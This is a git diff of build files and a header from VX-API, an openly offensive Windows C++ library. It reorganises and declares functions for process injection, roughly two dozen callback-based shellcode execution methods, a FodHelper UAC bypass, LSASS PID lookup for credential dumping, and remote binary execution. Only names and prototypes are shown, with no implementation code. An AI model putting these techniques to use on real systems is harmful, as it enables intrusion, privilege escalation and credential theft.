--- a/VX-API/VX-API.vcxproj
+++ b/VX-API/VX-API.vcxproj
@ -239,7 +239,7 @@
    <ClCompile Include="IsRegistryKeyValid.cpp" />
    <ClCompile Include="LdrLoadGetProcedureAddress.cpp" />
    <ClCompile Include="MemoryFindMemory.cpp" />
-    <ClCompile Include="MpfExtractMaliciousPayloadFromZipFile.cpp" />
+    <ClCompile Include="MpfExtractMaliciousPayloadFromZipFileNoPassword.cpp" />
    <ClCompile Include="MpfLolExecuteRemoteBinaryByAppInstaller.cpp" />
    <ClCompile Include="Main.cpp" />
    <ClCompile Include="ManualResourceDataFetching.cpp" />
@ -251,8 +251,37 @@
    <ClCompile Include="MpfGetLsaPidFromNamedPipe.cpp" />
    <ClCompile Include="MpfGetLsaPidFromRegistry.cpp" />
    <ClCompile Include="MpfGetLsaPidFromServiceManager.cpp" />
+    <ClCompile Include="MpfPiControlInjection.cpp" />
+    <ClCompile Include="MpfPiQueueUserAPCViaAtomBomb.cpp" />
+    <ClCompile Include="MpfPiWriteProcessMemoryCreateRemoteThread.cpp" />
    <ClCompile Include="MpfProcessInjectionViaProcessReflection.cpp" />
-    <ClCompile Include="ProcessInjectionMain.cpp" />
+    <ClCompile Include="MpfSceViaCDefFolderMenu_Create2.cpp" />
+    <ClCompile Include="MpfSceViaCertEnumSystemStore.cpp" />
+    <ClCompile Include="MpfSceViaCertEnumSystemStoreLocation.cpp" />
+    <ClCompile Include="MpfSceViaEnumChildWindows.cpp" />
+    <ClCompile Include="MpfSceViaEnumDateFormatsW.cpp" />
+    <ClCompile Include="MpfSceViaEnumDesktopsW.cpp" />
+    <ClCompile Include="MpfSceViaEnumDesktopWindows.cpp" />
+    <ClCompile Include="MpfSceViaEnumDirTreeW.cpp" />
+    <ClCompile Include="MpfSceViaEnumDisplayMonitors.cpp" />
+    <ClCompile Include="MpfSceViaEnumerateLoadedModules64.cpp" />
+    <ClCompile Include="MpfSceViaEnumFontFamiliesExW.cpp" />
+    <ClCompile Include="MpfSceViaEnumFontsW.cpp" />
+    <ClCompile Include="MpfSceViaEnumLanguageGroupLocalesW.cpp" />
+    <ClCompile Include="MpfSceViaEnumObjects.cpp" />
+    <ClCompile Include="MpfSceViaEnumPwrSchemes.cpp" />
+    <ClCompile Include="MpfSceViaEnumResourceTypesExW.cpp" />
+    <ClCompile Include="MpfSceViaEnumSystemCodePagesW.cpp" />
+    <ClCompile Include="MpfSceViaEnumSystemGeoID.cpp" />
+    <ClCompile Include="MpfSceViaEnumSystemLanguageGroupsW.cpp" />
+    <ClCompile Include="MpfSceViaEnumSystemLocalesEx.cpp" />
+    <ClCompile Include="MpfSceViaEnumThreadWindows.cpp" />
+    <ClCompile Include="MpfSceViaEnumTimeFormatsEx.cpp" />
+    <ClCompile Include="MpfSceViaEnumUILanguagesW.cpp" />
+    <ClCompile Include="MpfSceViaEnumWindows.cpp" />
+    <ClCompile Include="MpfSceViaEnumWindowStationsW.cpp" />
+    <ClCompile Include="MpfSceViaK32EnumPageFilesW.cpp" />
+    <ClCompile Include="MpfSceViaMessageBoxIndirectW.cpp" />
    <ClCompile Include="ProxyRegisterWaitLoadLibrary.cpp" />
    <ClCompile Include="ProxyWorkItemLoadLibrary.cpp" />
    <ClCompile Include="RemoveDescriptorEntry.cpp" />
--- a/VX-API/VX-API.vcxproj.filters
+++ b/VX-API/VX-API.vcxproj.filters
@ -70,6 +70,15 @@
    <Filter Include="Source Files\Windows API Helper Functions\Malicious Capabilities\Process Injection">
      <UniqueIdentifier>{afb1a792-4365-4fb2-ae74-b93768c98289}</UniqueIdentifier>
    </Filter>
+    <Filter Include="Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution">
+      <UniqueIdentifier>{705254d6-86d7-47f6-a661-dd4430493a93}</UniqueIdentifier>
+    </Filter>
+    <Filter Include="Source Files\Windows API Helper Functions\Malicious Capabilities\UAC Bypasses">
+      <UniqueIdentifier>{82ab4698-4174-47b8-8b36-47e02ab01766}</UniqueIdentifier>
+    </Filter>
+    <Filter Include="Source Files\Windows API Helper Functions\Malicious Capabilities\LSASS Dumping">
+      <UniqueIdentifier>{182eb745-5d27-4728-bd5e-030c4df5b57a}</UniqueIdentifier>
+    </Filter>
  </ItemGroup>
  <ItemGroup>
    <ClCompile Include="Main.cpp">
@ -321,9 +330,6 @@
    <ClCompile Include="CreateFileFromDsCopyFromSharedFile.cpp">
      <Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
    </ClCompile>
-    <ClCompile Include="UacBypassFodHelperMethod.cpp">
-      <Filter>Source Files\Windows API Helper Functions\Malicious Capabilities</Filter>
-    </ClCompile>
    <ClCompile Include="DelayedExecutionExecuteOnDisplayOff.cpp">
      <Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
    </ClCompile>
@ -378,18 +384,12 @@
    <ClCompile Include="GetPidFromEnumProcesses.cpp">
      <Filter>Source Files\Windows API Helper Functions\Fingerprinting</Filter>
    </ClCompile>
-    <ClCompile Include="MpfGetLsaPidFromRegistry.cpp">
-      <Filter>Source Files\Windows API Helper Functions\Malicious Capabilities</Filter>
-    </ClCompile>
    <ClCompile Include="GetPidFromPidBruteForcing.cpp">
      <Filter>Source Files\Windows API Helper Functions\Fingerprinting</Filter>
    </ClCompile>
    <ClCompile Include="TryLoadDllMultiMethod.cpp">
      <Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
    </ClCompile>
-    <ClCompile Include="MpfGetLsaPidFromServiceManager.cpp">
-      <Filter>Source Files\Windows API Helper Functions\Malicious Capabilities</Filter>
-    </ClCompile>
    <ClCompile Include="GetPidFromNtQueryFileInformation.cpp">
      <Filter>Source Files\Windows API Helper Functions\Fingerprinting</Filter>
    </ClCompile>
@ -399,12 +399,6 @@
    <ClCompile Include="CreateThreadAndWaitForCompletion.cpp">
      <Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
    </ClCompile>
-    <ClCompile Include="MpfGetLsaPidFromNamedPipe.cpp">
-      <Filter>Source Files\Windows API Helper Functions\Malicious Capabilities</Filter>
-    </ClCompile>
-    <ClCompile Include="ShellcodeExecutionViaFunctionCallbackMain.cpp">
-      <Filter>Source Files\Windows API Helper Functions\Malicious Capabilities</Filter>
-    </ClCompile>
    <ClCompile Include="MpfComMonitorChromeSessionOnce.cpp">
      <Filter>Source Files\Windows API Helper Functions\Malicious Capabilities</Filter>
    </ClCompile>
@ -543,18 +537,120 @@
    <ClCompile Include="MpfProcessInjectionViaProcessReflection.cpp">
      <Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Process Injection</Filter>
    </ClCompile>
-    <ClCompile Include="ProcessInjectionMain.cpp">
-      <Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Process Injection</Filter>
-    </ClCompile>
    <ClCompile Include="MemoryFindMemory.cpp">
      <Filter>Source Files\String Manipulation</Filter>
    </ClCompile>
    <ClCompile Include="MiscGenericShellcodePayloads.cpp">
      <Filter>Source Files\Windows API Helper Functions\Malicious Capabilities</Filter>
    </ClCompile>
-    <ClCompile Include="MpfExtractMaliciousPayloadFromZipFile.cpp">
+    <ClCompile Include="MpfPiWriteProcessMemoryCreateRemoteThread.cpp">
+      <Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Process Injection</Filter>
+    </ClCompile>
+    <ClCompile Include="MpfPiQueueUserAPCViaAtomBomb.cpp">
+      <Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Process Injection</Filter>
+    </ClCompile>
+    <ClCompile Include="MpfPiControlInjection.cpp">
+      <Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Process Injection</Filter>
+    </ClCompile>
+    <ClCompile Include="ShellcodeExecutionViaFunctionCallbackMain.cpp">
+      <Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
+    </ClCompile>
+    <ClCompile Include="UacBypassFodHelperMethod.cpp">
+      <Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\UAC Bypasses</Filter>
+    </ClCompile>
+    <ClCompile Include="MpfGetLsaPidFromNamedPipe.cpp">
+      <Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\LSASS Dumping</Filter>
+    </ClCompile>
+    <ClCompile Include="MpfGetLsaPidFromRegistry.cpp">
+      <Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\LSASS Dumping</Filter>
+    </ClCompile>
+    <ClCompile Include="MpfGetLsaPidFromServiceManager.cpp">
+      <Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\LSASS Dumping</Filter>
+    </ClCompile>
+    <ClCompile Include="MpfExtractMaliciousPayloadFromZipFileNoPassword.cpp">
      <Filter>Source Files\Windows API Helper Functions\Malicious Capabilities</Filter>
    </ClCompile>
+    <ClCompile Include="MpfSceViaEnumChildWindows.cpp">
+      <Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
+    </ClCompile>
+    <ClCompile Include="MpfSceViaCDefFolderMenu_Create2.cpp">
+      <Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
+    </ClCompile>
+    <ClCompile Include="MpfSceViaCertEnumSystemStore.cpp">
+      <Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
+    </ClCompile>
+    <ClCompile Include="MpfSceViaCertEnumSystemStoreLocation.cpp">
+      <Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
+    </ClCompile>
+    <ClCompile Include="MpfSceViaEnumDateFormatsW.cpp">
+      <Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
+    </ClCompile>
+    <ClCompile Include="MpfSceViaEnumDesktopWindows.cpp">
+      <Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
+    </ClCompile>
+    <ClCompile Include="MpfSceViaEnumDesktopsW.cpp">
+      <Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
+    </ClCompile>
+    <ClCompile Include="MpfSceViaEnumDirTreeW.cpp">
+      <Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
+    </ClCompile>
+    <ClCompile Include="MpfSceViaEnumDisplayMonitors.cpp">
+      <Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
+    </ClCompile>
+    <ClCompile Include="MpfSceViaEnumFontFamiliesExW.cpp">
+      <Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
+    </ClCompile>
+    <ClCompile Include="MpfSceViaEnumFontsW.cpp">
+      <Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
+    </ClCompile>
+    <ClCompile Include="MpfSceViaEnumLanguageGroupLocalesW.cpp">
+      <Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
+    </ClCompile>
+    <ClCompile Include="MpfSceViaEnumObjects.cpp">
+      <Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
+    </ClCompile>
+    <ClCompile Include="MpfSceViaEnumResourceTypesExW.cpp">
+      <Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
+    </ClCompile>
+    <ClCompile Include="MpfSceViaEnumSystemCodePagesW.cpp">
+      <Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
+    </ClCompile>
+    <ClCompile Include="MpfSceViaEnumSystemGeoID.cpp">
+      <Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
+    </ClCompile>
+    <ClCompile Include="MpfSceViaEnumSystemLanguageGroupsW.cpp">
+      <Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
+    </ClCompile>
+    <ClCompile Include="MpfSceViaEnumSystemLocalesEx.cpp">
+      <Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
+    </ClCompile>
+    <ClCompile Include="MpfSceViaEnumThreadWindows.cpp">
+      <Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
+    </ClCompile>
+    <ClCompile Include="MpfSceViaEnumTimeFormatsEx.cpp">
+      <Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
+    </ClCompile>
+    <ClCompile Include="MpfSceViaEnumUILanguagesW.cpp">
+      <Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
+    </ClCompile>
+    <ClCompile Include="MpfSceViaEnumWindowStationsW.cpp">
+      <Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
+    </ClCompile>
+    <ClCompile Include="MpfSceViaEnumWindows.cpp">
+      <Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
+    </ClCompile>
+    <ClCompile Include="MpfSceViaEnumerateLoadedModules64.cpp">
+      <Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
+    </ClCompile>
+    <ClCompile Include="MpfSceViaK32EnumPageFilesW.cpp">
+      <Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
+    </ClCompile>
+    <ClCompile Include="MpfSceViaEnumPwrSchemes.cpp">
+      <Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
+    </ClCompile>
+    <ClCompile Include="MpfSceViaMessageBoxIndirectW.cpp">
+      <Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
+    </ClCompile>
  </ItemGroup>
  <ItemGroup>
    <ClInclude Include="Internal.h">
--- a/VX-API/Win32Helper.h
+++ b/VX-API/Win32Helper.h
@ -38,72 +38,6 @@
 #define InlineGetCurrentThread ((HANDLE)(LONG_PTR)-2)
 #define InlineGetCurrentProcess (HANDLE)((HANDLE)-1)

-
-/*******************************************
- SHELLCODE VIA CALLBACK ROUTINE INFORMATION
-*******************************************/
-
-/*
-
-    LPBYTE Payload
-        a pointer to shellcode
-    DWORD dwLengthOfPayloadInBytes
-        the length of the payload in bytes
-    Enum SHELLCODE_EXECUTION_METHOD
-        specifies shellcode execution method
-        
-
-    example:
-    SHELLCODE_EXECUTION_INFORMATION Sei = { 0 };
-    Sei.Payload = Shellcode; //pointer to shellcode
-    Sei.dwLengthOfPayloadInBytes = 280; //whatever the length is
-    Sei.Method = E_CERTENUMSYSTEMSTORE; //method from SHELLCODE_EXECUTION_METHOD
-*/
-
-typedef enum SHELLCODE_EXECUTION_METHOD {
-    E_CDEFFOLDERMENU_CREATE2 = 1,
-    E_CERTENUMSYSTEMSTORE, //2
-    E_CERTENUMSYSTEMSTORELOCATION, //3
-    E_CERTFINDCHAININSTORE, //4 UNSTABLE, FAILS
-    E_ENUMCHILDWINDOWS, //5
-    E_ENUMDATEFORMATSW, //6
-    E_ENUMDESKTOPWINDOWS, //7
-    E_ENUMDESKTOPSW, //8
-    E_ENUMDIRTREEW, //9
-    E_ENUMDISPLAYMONITORS, //10
-    E_ENUMFONTFAMILIESEXW, //11
-    E_ENUMFONTSW, //12
-    E_ENUMICMPROFILESW, //13 UNSTABLE, FAILS
-    E_ENUMLANGUAGEGROUPLOCALESW, //14
-    E_ENUMOBJECTS, //15
-    E_ENUMPROPSEXW, //16 NOT IMPLEMENTED!
-    E_ENUMRESOURCETYPESEXW, //17
-    E_ENUMSYSTEMCODEPAGES, //18
-    E_ENUMSYSTEMGEOID, //19
-    E_ENUMSYSTEMLANGUAGEGROUPS, //20
-    E_ENUMSYSTEMLOCALESEX, //20
-    E_ENUMTHREADWINDOWS, //21
-    E_ENUMTIMEFORMATSEX, //22
-    E_ENUMUILANGUAGESW, //23
-    E_ENUMWINDOWSTATIONSW, //24
-    E_ENUMWINDOWS, //25
-    E_ENUMPROPSW, //26 UNSTABLE, FAILS
-    E_MESSAGEBOXINDIRECT, //27 UNSTABLE, FAILS
-    E_PERFSTARTPROVIDEREX, //28 UNSTABLE, FAILS
-    E_MINIDUMPWRITEDUMP, //29 UNSTABLE, FAILS
-    E_ENUMERATELOADEDMODULES, //30
-    E_ENUMPAGEFILESW, //31
-    E_ENUMPWRSCHEMES, //32
-    E_DNSQUERYEX, //33
-    E_RTLUSERFIBERSTART //34 UNSTABLE, FAILS
-}SHELLCODE_EXECUTION_METHOD, *PSHELLCODE_EXECUTION_METHOD;
-
-typedef struct __SHELLCODE_EXECUTION_INFORMATION {
-    LPBYTE Payload;
-    DWORD dwLengthOfPayloadInBytes;
-    DWORD MethodEnum;
-}SHELLCODE_EXECUTION_INFORMATION, * PSHELLCODE_EXECUTION_INFORMATION;
-
 /*******************************************
 RAD HARDWARE BREAKPOINT HOOKING ENGINE DATA
 *******************************************/
@ -129,53 +63,6 @@ inline CRITICAL_SECTION CriticalSection = { 0 };
 inline DESCRIPTOR_ENTRY* Head = NULL;
 inline HARDWARE_ENGINE_INIT_SETTINGS_GLOBAL GlobalHardwareBreakpointObject;

-/*******************************************
- PROCESS INJECTION INFORMATION
-*******************************************/
-
-/*
-
-    LPBYTE Payload
-        a pointer to shellcode
-    DWORD dwLengthOfPayloadInBytes
-        the length of the payload in bytes
-    Enum PROCESS_INJECTION_METHOD
-        specifies process injection method
-    DWORD TargetPid
-        specify target process
-    [OPTIONAL] DWORD ThreadId 
-        specify target process thread id (depends PROCESS_INJECTION_METHOD)
-    [OPTIONAL] TCHAR PathToFile //depends on if youre using W or A suffix
-        path to DLL to load (depends PROCESS_INJECTION_METHOD)
-        
-
-    example:
-    PROCESS_INJECTION_INFORMATION Pii = { 0 };
-    Sei.Payload = Shellcode; //pointer to shellcode
-    Pii.dwLengthOfPayloadInBytes = 280; //whatever the length is
-    Pii.Method = E_PROCESSREFLECTION; //method from PROCESS_INJECTION_METHOD
-    Pii.ProcessId = 100; //whatever the process id is, this is just a random number lol
-    Pii.ThreadId = 0; //not required for this method
-    Pii.PathToFile = DllPath; pointer to path of dll you want loaded, only WCHAR supported
-
-*/
-
-typedef enum PROCESS_INJECTION_METHOD {
-    E_WRITEPROCESSMEMORY_CREATEREMOTETHREAD_EXECUTESHELLCODE, //0
-    E_PROCESS_REFLECTION_EXECUTESHELLCODE, //1 UNIMPLEMENTED
-    E_CTRL_INJECT, //2
-    E_QUEUE_USER_APC //3
-}PROCESS_INJECTION_METHOD, * PPROCESS_INJECTION_METHOD;
-
-typedef struct __PROCESS_INJECTION_INFORMATION {
-    LPBYTE Payload;
-    DWORD dwLengthOfPayloadInBytes;
-    DWORD MethodEnum;
-    DWORD ProcessId;
-    DWORD ThreadId;
-    PWCHAR PathToFile;
-}PROCESS_INJECTION_INFORMATION, *PPROCESS_INJECTION_INFORMATION;
-


 /*******************************************
@ -354,18 +241,45 @@ BOOL UacBypassFodHelperMethodW(_In_ PWCHAR PathToBinaryToExecute, _Inout_ PPROCE
 DWORD MpfGetLsaPidFromRegistry(VOID);
 DWORD MpfGetLsaPidFromServiceManager(VOID);
 DWORD MpfGetLsaPidFromNamedPipe(VOID);
-BOOL ShellcodeExecutionViaFunctionCallbackMain(_In_ PSHELLCODE_EXECUTION_INFORMATION Sei);
 DWORD MpfComMonitorChromeSessionOnce(VOID);
 DWORD MpfExecute64bitPeBinaryInMemoryFromByteArrayNoReloc(_In_ PBYTE BinaryImage);
 BOOL __unstable__preview__MpfSilentInstallGoogleChromePluginW(_In_ PWCHAR ExtensionIdentifier);
 BOOL __unstable__preview__MpfSilentInstallGoogleChromePluginA(_In_ PCHAR ExtensionIdentifier);
 BOOL MpfLolExecuteRemoteBinaryByAppInstallerW(_In_ PWCHAR RemoteUrlTextFile, _In_ DWORD RemoteUrlLengthInBytes);
 BOOL MpfLolExecuteRemoteBinaryByAppInstallerA(_In_ PCHAR RemoteUrlTextFile, _In_ DWORD RemoteUrlLengthInBytes);
-DWORD ProcessInjectionMain(_In_ PPROCESS_INJECTION_INFORMATION Pii);
 BOOL MpfProcessInjectionViaProcessReflection(_In_ PBYTE Shellcode, _In_ DWORD dwSizeOfShellcodeInBytes, _In_ DWORD TargetPid);
 BOOL MpfExtractMaliciousPayloadFromZipFileNoPasswordW(_In_ PWCHAR FullPathToZip, _In_ PWCHAR FullPathToExtractionDirectory);
 BOOL MpfExtractMaliciousPayloadFromZipFileNoPasswordA(_In_ PCHAR FullPathToZip, _In_ PCHAR FullPathToExtractionDirectory);
-
+BOOL MpfPiWriteProcessMemoryCreateRemoteThread(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes, _In_ DWORD TargetProcessId);
+BOOL MpfPiQueueUserAPCViaAtomBomb(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes, _In_ DWORD TargetThreadId);
+BOOL MpfPiControlInjection(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes, _In_ DWORD TargetProcessId);
+BOOL MpfSceViaEnumChildWindows(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
+BOOL MpfSceViaCDefFolderMenu_Create2(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
+BOOL MpfSceViaCertEnumSystemStore(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
+BOOL MpfSceViaCertEnumSystemStoreLocation(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
+BOOL MpfSceViaEnumDateFormatsW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
+BOOL MpfSceViaEnumDesktopWindows(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
+BOOL MpfSceViaEnumDesktopsW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
+BOOL MpfSceViaEnumDirTreeW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
+BOOL MpfSceViaEnumDisplayMonitors(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
+BOOL MpfSceViaEnumFontFamiliesExW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
+BOOL MpfSceViaEnumFontsW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
+BOOL MpfSceViaEnumLanguageGroupLocalesW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
+BOOL MpfSceViaEnumObjects(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
+BOOL MpfSceViaEnumResourceTypesExW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
+BOOL MpfSceViaEnumSystemCodePagesW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
+BOOL MpfSceViaEnumSystemGeoID(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
+BOOL MpfSceViaEnumSystemLanguageGroupsW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
+BOOL MpfSceViaEnumSystemLocalesEx(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
+BOOL MpfSceViaEnumThreadWindows(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
+BOOL MpfSceViaEnumTimeFormatsEx(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
+BOOL MpfSceViaEnumUILanguagesW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
+BOOL MpfSceViaEnumWindowStationsW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
+BOOL MpfSceViaEnumWindows(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
+BOOL MpfSceViaEnumerateLoadedModules64(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
+BOOL MpfSceViaK32EnumPageFilesW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
+BOOL MpfSceViaEnumPwrSchemes(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
+BOOL MpfSceViaMessageBoxIndirectW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes); //Unstable, only triggers on certain button presses, prone to crashing


 /*******************************************
@ -454,6 +368,6 @@ INT __demonstration_WinMain(VOID); //hook sleep
 /*******************************************
 GENERIC SHELLCODE PAYLOADS FOR TESTINGS
 *******************************************/
-PCHAR GenericShellcodeHelloWorldMessageBoxA(VOID);
-PCHAR GenericShellcodeOpenCalcExitThread(VOID);
-PCHAR GenericShellcodeHelloWorldMessageBoxAEbFbLoop(VOID);
+PCHAR GenericShellcodeHelloWorldMessageBoxA(_Out_ PDWORD SizeOfShellcodeInBytes);
+PCHAR GenericShellcodeOpenCalcExitThread(_Out_ PDWORD SizeOfShellcodeInBytes);
+PCHAR GenericShellcodeHelloWorldMessageBoxAEbFbLoop(_Out_ PDWORD SizeOfShellcodeInBytes);